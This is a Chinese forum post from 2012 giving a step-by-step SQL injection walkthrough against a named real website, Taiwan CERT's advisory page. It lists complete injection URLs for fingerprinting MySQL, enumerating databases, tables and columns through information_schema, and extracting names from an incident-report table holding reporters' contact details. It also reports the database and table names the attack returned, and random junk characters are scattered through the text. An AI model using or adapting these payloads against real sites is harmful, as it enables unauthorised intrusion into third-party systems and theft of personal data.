1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
' w( ?: o' C! x) y2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解, g3 W3 \8 g- i9 b: e
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
) c. [9 i) g& ^6 b1 l3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--, k" U; \) i; l
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
% ^# a2 S3 f1 u" s4.判断有没有写权限: C! V5 t" T5 |
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限" z z) }) C5 x0 I2 l# W9 J- g
没办法,手动猜表啦
- f, p( P- ]- e, ^5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1/ S; A7 o) d, @/ x. S
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下& @ Q) t) P" D' z* m5 a7 g
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--% `2 [, \; y% O* x2 Q) {6 P' g: l+ n
成功查出所有数据库,国外的黑客就是不一般。数据库如下:
: y. D" `7 U8 f- p" Z1 j1 ginformation_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
& _$ K9 `) f7 B. d6.爆表,爆的是twcert库' O0 m1 ]0 I2 m: c& }& q
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--" a8 e: i) i" }. c$ H u
爆出如下表8 E. q( c, v* D
downloadfile,irsys,newsdata,secrpt,secrpt_big59 a; _- H% K: u8 A2 q
7.爆列名,这次爆的是irsys表
% \+ y( O9 r6 dhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--6 U. w, c1 H5 e* u) `# e% Z; a
爆出如下列
: `2 Q" }9 V0 N0 Jir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status6 d* |1 v, v$ F
8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。2 [9 H% l5 f' ?
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--$ q6 Q/ [0 c9 c6 }9 H
返回是3,说明每个列里有3个地段
+ s# y% @+ E) Z9 m- P5 U9.爆字段内容# N3 n: F2 B7 F! G9 X. a
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
$ D* D- |( z4 f8 _! `! {# n- S爆出name列的第一个字段的内容2 d$ G) c6 d% D2 Z( V! [+ `
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--6 e, V1 I/ I5 M( P
爆出name列的第二个字段的内容 |
发表于 2012-9-13 17:57:04
收藏
支持
反对